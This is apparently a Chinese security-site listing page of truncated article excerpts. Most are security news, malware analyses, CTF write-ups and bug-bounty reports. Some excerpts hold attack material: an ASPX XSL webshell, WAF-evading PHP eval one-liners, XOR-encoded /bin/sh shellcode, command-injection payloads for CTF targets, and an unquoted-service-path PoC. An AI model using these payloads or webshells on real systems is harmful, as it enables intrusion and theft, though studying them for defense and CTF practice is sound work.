主题
-
# Exploit Title: _GCafé 3.0 - 'gbClienService' Unquoted Service Path # Google Dork: N/A # Date: 2019-11-09 # Exploit Author: Doan Nguyen (4ll4u) # Vendor Homepage: https://gcafe.vn/ # Software Link: https://gcafe.vn/post/view?slug=gcafe-3.0 # Version: v3.0 # Tested on: Windows 7, Win 10, WinXP # CVE : N/A # Description: # GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points # PoC: # wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ gbClientService gbClientService C:\Program Files\GBillingClient\gbClientService.exe Auto #C:\>sc qc gbClientServ…
-
7月17日,在首届“安全平行切面大会”上,“安全平行切面联盟” (Aspect-Oriented Technology Alliance,简称AOTA )在会上正式成立。 该联盟在中国信息协会信息安全专业委员会指导下成立,由蚂蚁集团联合行业共同发起,将为行业安全实战对抗、网络安全保险、安全合规治理带来全新的能力,为网络安全、数据安全、个人信息保护构建全新的技术基础平台,有望引导行业建立全新的安全治理范式。 (从左至右)中国科学技术大学教授左晓栋,蚂蚁集团副总裁、首席技术安全官韦韬,中国信息协会信息安全专委会副主任赵进延,北京华云安信息技术有限公司CEO沈传宝 蚂蚁集团于2019年首次在业界提出安全平行切面体系理念,到如今“安全平行切面联盟”的成立,见证了蚂蚁集团从理念创新到实践落地,快速打造出面向企业数字生命体的新一代安全基础平台的突破能力,也通过“产、学、研、用”的深入融合,不断营造良性的产业生态。 中国科学技术大学网络空间安全学院教授左晓栋——完善的防御体系,才是支撑业务运行的关键 中国科学技术大学网络空间安全学院教授左晓栋表示,网络安全防御体系的研究,贯穿着整个网络安全技术的发展。站在安全角度,完善的网络安全防护体系需要包含安全防护、检测、响应、恢复功能以及对抗能力等要素。但事实上,网络安全的防护体系更需要支撑业务运行。 所以,网络安全产品技术本身的最初设计,需要改变原来的研发模式和思路,应该从应用角度出发,支持安全体系的部署,并且融合业务。安全平行切面体系恰恰在解决业务与安全矛盾的层面上,取得了重要突破。尤其是在数据安全领域,数据…
-
1 概述 近期,安天CERT通过网络安全监测发现了一起新的挖矿木马攻击事件,该挖矿木马从2023年11月开始出现,期间多次升级组件,目前版本为3.0。截止到发稿前,该挖矿木马攻击事件持续活跃,感染量呈上升态势。主要特点是隐蔽性强、反分析、DLL劫持后门和shellcode注入等,因此安天CERT将该挖矿木马命名为“匿铲”。 在此次攻击活动中,攻击者利用了两个比较新颖的技术以对抗反病毒软件,第一个技术是滥用反病毒软件的旧版本内核驱动程序中的功能来结束反病毒软件和EDR,这个技术通过一个主体的PowerShell脚本、一个独立的PowerShell脚本和一个控制器(内存加载的小型可执行文件)来完成,主体的PowerShell脚本用于下载并安装反病毒软件的旧版本内核驱动程序,独立的PowerShell脚本用于解密并内存加载控制器,控制器用来控制内核驱动程序。虽然被滥用的旧版本内核驱动程序早已更新,但目前仍能被非法利用并有效结束大多数反病毒软件。 第二个技术是利用MSDTC服务加载后门DLL,实现自启动后门,达到持久化的目的。这个技术利用了MSDTC服务中MTxOCI组件的机制,在开启MSDTC服务后,该组件会搜索oci.dll,默认情况下Windows系统不包含oci.dll。攻击者会下载后门DLL重命名为oci.dll并放在指定目录下,通过PowerShell脚本中的命令创建MSDTC服务,这样该服务会加载oci.dll后门,形成持久化操作。 经验证,安天智甲终端防御系统不会被反病毒软件的旧版本内核驱动程序所阻断,也能够对该后门DLL的有效…
-
互联网情报公司 GreyNoise 报告称,自 2020 年 1 月以来,它一直在追踪包含伪造互联网流量的大量“噪音风暴”。 然而,尽管进行了广泛的分析,仍未得出其来源和目的的结论。这些噪音风暴被怀疑是秘密通信、DDoS 攻击协调信号、恶意软件操作的秘密指挥和控制 (C2) 通道,或配置错误的结果。 一个奇怪的方面是生成的 ICMP 数据包中存在“LOVE”ASCII 字符串,这进一步增加了对其目的的猜测,并使案件更加有趣。 GreyNoise 发布此信息,希望网络安全研究人员社区能够帮助解开这个谜团,并揭示出造成这些奇怪噪音风暴的原因。 噪音风暴的特征 GreyNoise 观察到大量伪造的互联网流量,这些流量来自 QQ、微信和 WePay 等各种来源的数百万个伪造 IP 地址。 这些“风暴”会向 Cogent、Lumen 和 Hurricane Electric 等特定互联网服务提供商发起大量流量,但会避开其他服务提供商,尤其是亚马逊网络服务 (AWS)。 流量主要集中于 TCP 连接,特别是针对端口 443,但也有大量 ICMP 数据包,最近其中包括嵌入的 ASCII 字符串“LOVE”,如下所示。 包含“Love”字符串的 ICMP 数据包 TCP 流量还会调整窗口大小等参数来模拟不同的操作系统,使活动保持隐秘,难以被精确定位。生存时间 (TTL) 值决定了数据包在被丢弃之前在网络上停留的时间,该值设置在 120 到 200 之间,以模拟真实的网络跳数。 总而言之,这些“噪音风暴”的形式和特征表明,是参与者的蓄意所为,而不是错误…
-
美国联邦贸易委员会 (FTC) 称,一些在线工作进行诈骗的现象(称为“任务诈骗”)大幅增加,这些诈骗吸引人们通过重复性任务赚取现金,并承诺如果他们存入自己的钱,就能赚更多钱。 尽管这种类型的诈骗在 2020 年前几乎不存在,但自去年起 FTC 已经记录了 5000 起案件。到了 2024 年,涉及任务诈骗的举报数量激增,仅上半年 FTC 就收到了 20000 份来自被诈骗个人的举报。 因此,从 2020 年到 2023 年,报告的工作诈骗造成的经济损失增加了两倍,从 1 月到 2024 年 6 月,损失超过 2.2 亿美元。 FTC 表示,其中大约 40% 的损失是由“任务诈骗”增加造成的,报告的损失为 4100 万美元。 工作任务诈骗增多 类似“赌博”式工作 FTC 解释说,诈骗者通过 WhatsApp 和其他通信或社交媒体平台上未经请求的消息来接近受害者。诈骗者提供了一种简单的赚钱方法,告诉他们所要做的就是每天执行一组任务来赚钱,例如在在线平台或通过特殊应用程序上点赞视频或对产品进行评分。这些骗局冒充合法公司,例如德勤、亚马逊、麦肯锡公司和 Airbnb,并为受害者提供成组的任务,通常有 40 项。用户承诺每次完成一套并升级到下一个级别时都会收到升级佣金。 冒充德勤的任务诈骗 乍一看,这个骗局看起来很合法,因为求职者赚取了 50 至 60 美元的 USDT 或以太坊加密货币小额存款。然而,在某些时候,当受害者在应用程序上积累了可观的“佣金”时,他们会被要求进行存款,声称为了解锁提款选项和下一个任务集。许多受害人存钱,都是希望能…
-
谷歌、AWS和Cloudflare三家公司周二发布公告称,它们阻止了据称有史以来最大的DDoS攻击。 这次攻击是由一个新的DDoS漏洞(编号为CVE-2023-44487)引起的,涉及HTTP/2协议,用于互联网上传输文件的一套标准化规则。美国国家标准与技术研究所(NIST)官网上的漏洞页面介绍说到:“HTTP/2协议之所以允许拒绝服务(服务器资源消耗),是由于请求取消可以快速重置许多请求流。” 作为多方协调披露的一部分,谷歌云、亚马逊网络服务(AWS)和Cloudflare都发布了博文和公告,提供了有关这条DDoS攻击途径的更多技术信息。在谷歌发布的两篇博文中的一篇中,这家科技巨头称之为“迄今为止最大的DDoS攻击,峰值时期每秒超过3.98亿个请求。” 在Cloudflare的技术分析博文中,它追踪到峰值时期每秒超过2.01亿个请求,几乎是之前观察到的创纪录攻击的三倍。 Cloudflare的两名工程师Lucas Pardue和Julien Desgats写道:“令人担忧的是,攻击者仅用2万台机器组成的僵尸网络就能发动这等规模的攻击。现在的僵尸网络由数十万乃至数百万台机器组成。考虑到整个互联网通常每秒只出现10亿到30亿个请求,可想而知,使用这种方法可以将整个互联网的请求都集中在少数目标上。” 在另一篇博文中,谷歌的两名工程师Juho Snellman和Daniele Iamartino专门介绍了这起攻击和攻击途径的工作原理。他们写道,这次名为Rapid Reset(“快速重置”)的攻击持续了几个月,在8月份达到了高峰。 博文作者说道,…
-
据一位安全研究人员声称,由于服务器存在几个漏洞,一家专业生产贞操设备的公司泄露了用户们的电子邮件地址、明文密码、家庭住址和IP地址,在一些情况下还泄露了用户们的GPS坐标。使用贞操设备,女性就可以通过互联网控制配偶或伴侣的“幸福”活动。 这位研究人员不愿透露姓名,因为他希望自己的专业工作与他开展的这项情趣研究工作分开来。他表示,由于两个漏洞,自己得以成功访问了一个数据库,里面含有1万多用户的记录。这位研究人员表示,他利用这些漏洞来查看可以访问哪些数据。从他发送并分享给外媒的电子邮件截图来看,他还在6月17日联系了这家公司,提醒对方注意安全问题,试图让对方修复漏洞,并保护用户的数据。 截至发稿时,这家公司尚未修复这些漏洞,也没有回应外媒多次提出的置评请求。 这位研究人员表示:“一切都太容易被利用了。这是厂家不负责任的表现。所以我最大的希望是厂家会联系我和外媒,修复所有漏洞。” 由于这些漏洞尚未修复,外媒没有公布这家公司的身份,以保护其用户,用户的数据仍处于危险之中。外媒还联系了这家公司的网站主机提供商,对方表示会提醒这家设备厂商,并联系了中国计算机应急响应小组(CERT),以提醒这家公司。 由于没有得到任何回复,这名研究人员在8月23日有意毁损了这家公司的主页,试图再次警告这家公司及其用户。 这位研究人员写道:“该网站已被善意的第三方关闭了。该厂家任由网站敞开,允许任何脚本小子获取任何和所有的客户信息。这包括明文密码以及送货地址,该厂家口口声称不包括送货地址。如果你已经购买了一个设备,现在无法使用,我很抱歉。但是有成千上万的人在这里注册了帐…
-
1 概览 “游蛇”黑产团伙自2022年下半年开始活跃至今,针对国内用户发起了大量钓鱼攻击和诈骗活动。该类黑产传播的恶意程序变种多、频繁更换免杀手段及基础设施、攻击目标所涉及的行业广泛。近期,安天CERT监测到“游蛇”黑产团伙针对财税人员传播恶意Excel文件,诱导用户点击其中的超链接跳转至钓鱼网站,从中下载执行恶意程序。 恶意程序执行后加载恶意的Index.asp文件,然后分多个阶段下载执行恶意AutoHotKey、Python脚本、以及两段Shellcode,最终在受害者计算机的内存中执行远控木马。该远控木马具备键盘记录、剪贴板监控、屏幕截图等基本窃密功能,并支持接收执行多种远控命令。“游蛇”黑产团伙攻击者通常会利用远控木马控制受害者计算机中的即时通讯软件,冒充受害者身份进行后续的攻击、诈骗活动。 “游蛇”黑产团伙仍在频繁地对恶意软件、免杀手段以及相关基础设施进行更新,每天依旧有一定数量的用户遭受攻击并被植入远控木马。安天CERT建议用户接收文件时保持警惕,避免点击安全性未知的可执行程序、脚本、文档等文件,以免遭受“游蛇”攻击,造成不必要的损失。 经验证,安天智甲终端防御系统(简称IEP)可实现对该远控木马的有效查杀。 排查方案详见本文第四章节,相关防护建议详见第五章节。 2 技术梳理 在此次攻击活动中,攻击者投放的诱饵文件是名称为“(六月)偷-漏涉-税-违规企业名单公示.xlsx”的Excel文件,诱导用户点击其中的“点击查看”,从而跳转至钓鱼网站中。 图 2‑1诱饵文件 该钓鱼网站如下图所示,用户点击该网站中的任意按钮后会下载一个…
-
1 概览 “游蛇”黑产自2022年下半年开始活跃至今,针对国内用户发起了大量钓鱼攻击和诈骗活动。该类黑产传播的恶意程序变种多、更新免杀手段快、更换基础设施频繁、攻击目标所涉及的行业广泛。近期,安天CERT监测到“游蛇”黑产针对与金融、财务相关的企业及人员进行的攻击活动。攻击者投放的初始恶意文件主要有三类:可执行程序、CHM文件、商业远控软件“第三只眼”,伪造的文件名称大多与财税、资料、函件等相关。 由于商业远控软件“第三只眼”提供多方面的远程监控及控制功能,并且将数据回传至厂商提供的子域名服务器、根据qyid值识别控制端用户,攻击者无需自己搭建C2服务器,因此恶意利用该软件进行的攻击活动近期呈现活跃趋势。 “游蛇”黑产仍在频繁地对恶意软件、免杀手段以及相关基础设施进行更新,每天依旧有一定数量的用户遭受攻击并被植入远控木马。安天CERT建议用户接收文件时保持警惕,避免点击安全性未知的可执行程序、脚本等文件,以免遭受“游蛇”攻击,造成不必要的损失。建议未购买使用“第三只眼”远控软件的用户,使用流量监测设备检查网络中是否存在与“dszysoft.com”及其子域名相关的连接记录,若存在则表明可能被恶意植入了相关远控,用户也可以考虑对相关域名进行封禁。 经验证,安天智甲终端防御系统(简称IEP)可实现对该类远控木马的有效查杀。相关防护建议详见本文第四章节。 2 技术梳理 近期,安天CERT监测到攻击者投放的初始恶意文件主要有三类,伪造的文件名称大多与财税、资料、函件等相关。 表 2‑1近期部分样本伪装名称 伪装的程序名称 企业补贴名单.exe …
-
今年4月15日、7月8日,中国国家计算机病毒应急处理中心等机构连续发布了两次专题报告,揭露了美方利用所谓“伏特台风”虚假叙事行动计划对我国抹黑的真实意图。 10月14日,我国网络安全机构第三次发布专题报告,进一步公开美国政府机构和“五眼联盟”国家针对中国和德国等其他国家,以及全球互联网用户实施网络间谍窃听、窃密活动,并掌握了美国政府机构通过各种手段嫁祸他国的相关证据,另外还有他们采取“供应链”攻击,在互联网设备产品中植入后门等事实,彻底揭穿所谓“伏特台风”这场由美国联邦政府自导自演的政治闹剧。 美研发嫁祸他国隐身“工具包”代号“大理石” 报告显示,长期以来,美国在网络空间积极推行“防御前置”战略,并实施“前出狩猎”战术行动,也就是在对手国家周边地区部署网络战部队,对这些国家的网上目标进行抵近侦察和网络渗透。为适应这种战术需要,美国情报机构专门研发了掩盖自身恶意网络攻击行为、嫁祸他国的隐身“工具包”,代号“大理石”。 国家计算机病毒应急处理中心高级工程师杜振华介绍,“大理石”的主要功能是对这种网络武器,也就是像间谍软件或者恶意程序代码中的可识别特征进行混淆,甚至是擦除。就像是把开发者的指纹给擦除了,也相当于像把枪械武器的膛线改变了,所以导致从技术上对这种武器的溯源变得非常困难。 技术团队调查发现,根据“大理石”工具框架源代码及其注释显示,它被确定为一个机密级(且不可向国外透露)的武器研发计划,起始时间不晚于2015年。“大理石”工具框架可以使用超过100种混淆算法,它能将源代码文件中可读的变量名、字符串等替换为不可读(不可识别)内容,并且可…
-
重发按语:2023年6月1日,卡巴斯基发布报告《三角行动:iOS设备被以前未知的恶意软件攻击》,当时报告中仅进行了事件披露,没有发布样本分析。为让全球用户更深入了解A2PT攻击组织的攻击能力,安天CERT在6月9日披露了一份历史积累分析成果,曝光了同一威胁来源方向的历史样本分析。与卡巴曝光的攻击来自于针对手机iMessage服务投放不同,安天曝光的样本来自于“量子”系统的投放,报告也因此命名为《“量子”系统击穿苹果手机》。历经数月的艰苦分析,卡巴于今日发布了新分析成果报告《三角行动:最后一个谜团》。安天勘误重发6月的报告,也提醒用户应广泛关注来自量子系统的空中投放。 // 该报告首次发布时《图 5‑3 量子系统可攻击场景图谱化分析》有误,已经勘正,特此致歉。 1 概述:覆盖智能终端的A2PT样本拼图 在过去二十多年的时间里,全球关键信息基础设施运营者、安全厂商、研究者所面临的重大考验是,如何应对以NSA等情报机构所发动的网络攻击活动,基于这种攻击活动应用了难以想象的技术与资源,安天CERT将这种攻击活动称之为A2PT(高级的高级持续性威胁)攻击,并发现其中多起攻击都来自于NSA下属的方程式组织。如何把A2PT攻击活动中的攻击样本与过程揭示出来,成为了一场比马拉松更艰苦的分析接力赛,这场接力至少已经完成了三次交接棒,第一阶段从2010年的“震网”事件触发,围绕“震网”—“火焰”—“毒曲”—“高斯”系列样本的攻击活动、样本同源性与关联展开,直到2013年的斯诺登事件出现,才发现这些只是冰山一角;第二阶段是从方程式组织(隶属于NSA)被曝光开始…
-
(Authenticated) ManageEngine ServiceDesk Plus MSP - CVE-2022-47966: Unauthenticated remote code execution Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 01/18/2023 Created 01/25/2023 Added 01/24/2023 Modified 06/06/2023 Description Unauthenticated remote code execution vulnerability in various ManageEngine products due to the usage of an outdated third party dependency, Apache Santuario. Solution(s) auth-manageengine-sdp-msp-cve-2022-47966 References https://attackerkb.com/topics/cve-2022-47966 CVE - 2022-47966 https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html https://www.rapid7.com/blog/p…
-
# Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] # Shellcode Author: Alexys (0x177git) # Tested on: Linux (x86_64) # Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh)) # Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram # Original code: [https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm) ---- Assembly code ---- section .text global _start _start: xor eax, eax xor edx, edx ; clear rdx (ar…
-
巡风简介 巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。其主体分为两部分:网络资产识别引擎与漏洞检测引擎。 网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测(支持调用MASSCAN),并进行指纹识别,识别内容包括:服务类型、组件容器、脚本语言、CMS。 漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测,其支持2种插件类型、标示符与脚本,均可通过web控制台进行添加。(转自https://github.com/ysrc/xunfeng) 安装Ubuntu就不说了,说下国内的比较快的源吧,省的网速不好,只能干等 Ubuntu 17.04的开发代号是Zesty Zapus,以下是Ubuntu 17.04网易源: sudo nano /etc/apt/source.list deb http://mirrors.163.com/ubuntu/ zesty main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-security main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-updates main restricted universe multiverse deb http://mi…
-
关于使用xsl的webshell以前已经有人发过了,比如aspx的一个webshell如下: <%@ Page Language="C#" Debug="true" %> <%@ import Namespace="System.IO"%> <%@ import Namespace="System.Xml"%> <%@ import Namespace="System.Xml.Xsl"%> <% string xml=@"<?xml version=""1.0""?><root>test</root>"; string xslt=@"<?xml version='1.0'?> <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""> <msxsl:script language=""JScript"" implements-prefix=""zcg""> <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c56193…
-
下载地址: 开源地址: https://github.com/m0l1ce/wooyunallbugs 百度网盘: 链接: http://pan.baidu.com/s/1nvkFKox 密码: 94sp 安装步骤: 1.首先下载一个集成环境工具,这里我用的 phpStudy2016. 下载地址:phpStudy 2016.11.03 再次更新,支持自定义php版本 2.然后解压到我的D盘上 3.把源码和数据库先下载到本地,图片用的是外连,人家也说了,放图片的服务器不会关掉的 4.把 bugs.rar 这个源码包解压到了D:\phpStudy\WWW\bugs\ 下 5.在源码里找见 conn.php 这个文件,用记事本打开,或者用notepad++ 打开,在里面修改成自己 MySQL 数据库的账号密码 。 6.然后把 wooyun.rar 拷贝到D:\phpStudy\MySQL\data 这里解压下,这里是数据库存放的地方。 7.启动 phpstudy ,然后点击面板上的选择版本,看下是不是 5.3 版本的,如果不是就选择到这个 5.3 版本 。(昨天就这个版本问题,害的我一连不上数据库。。。) 8.点击 mysql 管理器,站点域名管理,然后该杂弄杂弄。。。 9.一般到这里就结束了,直接启动服务器,然后然后输入 127.0.0.1 就能进入了主页面了。 10.先修改一个小错误,再继续说说其他的。他的源码不知道杂回事,…
-
0×01 姿势一 我们知道PHP动态函数很有意思,那么你猜到了,姿势一就是: <?php$_POST['xx']($_POST['oo']);?> 注意XX参数设置成EVAL是不行的哦,让我们来看看效果: 0×02 姿势二 关键词是过滤了,但是你老是交一些奇奇怪怪的东西,人家几万块买的WAF也不是吃白饭的啊。好好好你丑你说什么都是对的,我们不交了,getallheaders函数能够获取请求头内容,来试试新家伙: <?phpeval(getallheaders()['Accept-Language']);> 当然你要是猥琐到这样,那恭喜你,你已经学会举一反三了... <?php$a=getallheaders()['xxx'];$a(getallheaders()['ooo']);> 0×03 姿势三 遇到一般的waf可能上个姿势就能绕过,但是还是会有一些臭不要脸的waf会检测http请求头里的内容,咱们还是从技术角度出发来看看这个问题怎么绕过,猥琐的人可能首先想到了的base64,更猥琐的人可能想到了各种自写函数进行编码,替换,但是我见过最猥琐的思路是gzuncompress和gzcompress函数,话不多说我们先放壳: <?phpeval(gzuncompress(base64_decode(getallheaders()['xx'])));> http头部的里面的xx字段看起来像base64编码(其实实他就是base64编…
-
引入 来自于5.16提交的某edu站的漏洞,所有隐私信息均打码发布,只分享思路, 漏洞1:未授权访问 填写信息 之后查看申请记录 此时可得到/api/applyInfo/getListById接口 构造数据包(POC在圈内) 遍历ID接口可获得大量的Openid和个人信息及身份证号 未授权访问*1 返回结果: 得到身份证信息等相关信息,记录openid 以下以40209的openid为例 未授权访问*2 再次点击入校申请: 得到/api/applyInfo/getListByUser接口 用openid遍历/api/applyInfo/getListByUser也可未授权访问大量身份证,姓名等信息 未授权访问*2 返回结果: 文件上传(此洞edu不收,但可以作为一个思路) 再次点击入校申请 上传接口未对白名单进行有效鉴别 导致部分后缀如txt和js可以上传到服务器里并成功解析 得到接口/api/upload/fileUpload 构造数据包 Js成功上传 访问成功上传的js路径: 成功访问 成功访问 如不对相关后缀进行拦截,用户可以上传大量JS内容并成功在外部引用消耗服务器资源 构造引用接口 <!DO…
-
sessionkey引入 微信sessionkey是微信小程序开发中用于标识用户会话的一串密钥。当用户在微信小程序中进行登录操作时,微信服务器会返回一个session_key,开发者可以使用这个session_key来获取用户的身份信息或进行加密通信. 如果sessionkey泄露就可以进行获取用户信息,伪造登录. 师傅404Xyunxi就是通过sessionkey打的 拿到了江西财经大学的证书 [5.20]提交的某edusrc平台案例 此次案例就是通过sessionkey泄露达到伪造登录的 期中此次信息搜集的骚操作方法来自师傅404Xyunxi,收益匪浅 伪造登录工具:Wx_SessionKey_crypt 发现漏洞一:sessionkey泄露 点击登录 抓取数据包 微信session key泄露 伪造登录需要手机号 从抖音信息搜集到手机号 在抖音搜索相关平台信息,得到泄露的手机号 得到私人手机号187291***** 伪造登录 1.先解密自己的: 2.在伪加密替换成他的 替换encrypetdData,成功伪造登录 每次替换的时候encryptedData和iv都会改变,所以每次的包都不同,这里就不提供数据包了 发现漏洞二:逻辑缺陷 使用自己的手机号再次点击登录 无法登录 此…
-
前言 Web89 intval取整数 就跟python中的int一样 这里是只要有0-9就输出nonono 但是还需要是传出去是整数 所以我们用数组绕过 Web90 intval($var,$base),其中var必填,base可选,这里base=0,则表示根据var开始的数字决定使用的进制: 0x或0X开头使用十六进制,0开头使用八进制,否则使用十进制。 这里是0开头 说明是根据开始的数字决定使用的进制 这里用的是八进制十六进制绕过 加0是告诉服务器这是八进制 如果转换成十六进制需要加0x Web91 不想打字了,感觉WP里给的说的好全面 i忽略大小写 m多行模式 我们只要让我们的参数里含有php即可 payload:cmd?=111%0aphp 或者cmd?=php%0aggg Web92 这里与web90的不同之处就在于等号了 ===表示类型和数值必须相等 ==是值相等就可以类型不一定相等 我们知道强制转换如果是小数部分的话会舍弃小数部分直接构造小数 Web93 不解释直接秒 Web94 查一下strpos用法 这里说明我们得含有0 但不能在开头,因为开头告诉服务器使用几进制 Web95 过滤了.八进制起手 +或者空格绕过最后一个限制 W…
-
前言 直接冲 Web29 error_reporting(0)先忽略错误 isset检查是否传参 传参c参数 如果匹配没有flag(i的意思是忽略大小写) 就可以执行eval函数,eval函数就不必介绍了吧 方法一: 使用tac读取文件 %20经过url编码是空格 *是匹配fla后所有的文件 ?c=system("tac%20fla*"); 方法二: 把flag.php里的文件内容复制到别处 ?c=system("cp fla*.php a.txt"); url编码后 ?c=system("cp%20fla*.php%20a.txt"); Web30 过滤了flag system以及php 并且忽略大小写 方法一: 忽略system可以用` ` 代替system进行执行命令 以及使用?进行占位 ?c=`cp fla?.??? 1.txt`; 当然用*也是可以的 方法二:、 使用passthru代替system执行命令 ?c=passthru("tac%20fla*"); Web31 过滤的更多了 过滤了flag system php cat sort shell 还有. 空格 以及单引号 单引号双引号等需要搭配\进行转义 方法一: 用…
-
前言 好,开冲了 Web41 过滤了0-9 a-z ~ + $[]{}-\等 使用的是post请求 这里直接用脚本 脚本的路径也附上 https://blog.csdn.net/miuzzx/article/details/108569080 把php脚本和python脚本放到一起 <?php $myfile = fopen("rce_or.txt", "w"); $contents=""; for ($i=0; $i < 256; $i++) { for ($j=0; $j <256 ; $j++) { if($i<16){ $hex_i='0'.dechex($i); } else{ $hex_i=dechex($i); } if($j<16){ $hex_j='0'.dechex($j); } else{ $hex_j=dechex($j); } $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){ echo ""; } else{ $a='%'.$hex_i; $b='%'.$hex_j; $…
-
前言 好,继续冲 Web53 过滤了很多,默认system输入的是返回值而不是结果值 ?c=ta''c${IFS}fla?.php Web54 过滤很多 tac被过滤了 但是cp和mv都没被过滤 ?c=cp${IFS}fla?.php${IFS}t.txt Web55(熟悉掌握三种方法) 看似过滤的少,实际上砍到大动脉了 因为过滤了a-z 方法一: 我们可以用来把flag.php的内容转为base64并且进行解码 过滤了a-z我们之间?代替 数字没被禁数字之外的用?等价代替 我们的命令本来是?c=/bin/base64 flag.php 转换后则是 ?c=/???/????64 ????.??? 解码即出 方法二: 还有一种做法,就是使用 /usr/bin/bzip2 进行对文件的压缩 ?c=/???/???/????2 ????.??? 然后 最后访问 /flag.php.bz2进行下载压缩包 方法三: 这个方法最逆天了 我们知道在linux中./你的文件名.后缀 是可以执行脚本文件的 然而这个靶没有过滤.和/ 我们就可以上传文件进行执行 制作一个POST表单 我们知道php上传文件会临时储存在/tmp/phpXXXXX里大都是时一共是八位数000 …
-
前言 靶场地址:https://ctf.show/challenges 如果此时此刻还没burpsuite可以用开盒即用版的(域这里用的就是 最新BurpSuite2023专业汉化版下载(无需任何配置) 2年前29106110 Web21 这里进行抓包 这里可以看到他是通过Base64进行编码的 选择狙击手模式 密码字典下载他们给我们用的字典 我们要对admin:后的密码进行爆破所以需要截取一下 添加前缀 进行base64编码 url取消打勾(这里要进行base64编码 =会造成编码失败 Web22 Web22ctfshow挂了 Web23 打开一看 分析一下 这里包含了一个flag.php 需要满足条件输出 这里是isset是检查是否get传参token这个参数,如果传参了就进入if里 下一步将传参…
-
前言 接上回章节 Web25 没想到都是随机种子的爆破… 传入r用0-随机生成的种子 如果设置的cookie等于第二次和第三次随机种子之和则输出flag 下载Php随机种子爆破包https://www.openwall.com/php_mt_seed/php_mt_seed-4.0.tar.gz 编译一下 如果出错了在前面需要加#include <sys/times.h>头文件 make #编译 先给他随机传参 检查一下php版本是7.1+ 我们找个7.1+版本 编写脚本(注意这个种子可能需要爆破多次,所以这里只是提供一个方法)我尝试多个种子爆破 <?php mt_srand(1064029812); echo mt_rand()."\n"; $result = mt_rand()+mt_rand(); echo $result; ?> 我们复制第二次的种子 这里cookie传入的token需要是第一次和第二次的种子之和 我们使用我们的cookie-Editor进行写入token 下一步进行传参r进入循环 Web26 打开一看需要安装 这里数据库的信息CTFshow都给我们了 但是连接是失败的所以需要爆破 需…
文件
-
-
- 2 资源中心
-
- 28 资源中心
-
- 9 资源中心
-
- 3 资源中心
-
- 24 资源中心
-
- 2 资源中心
-
- 2 资源中心
-
- 5 资源中心
-
- 22 资源中心
-
-
- 7 资源中心
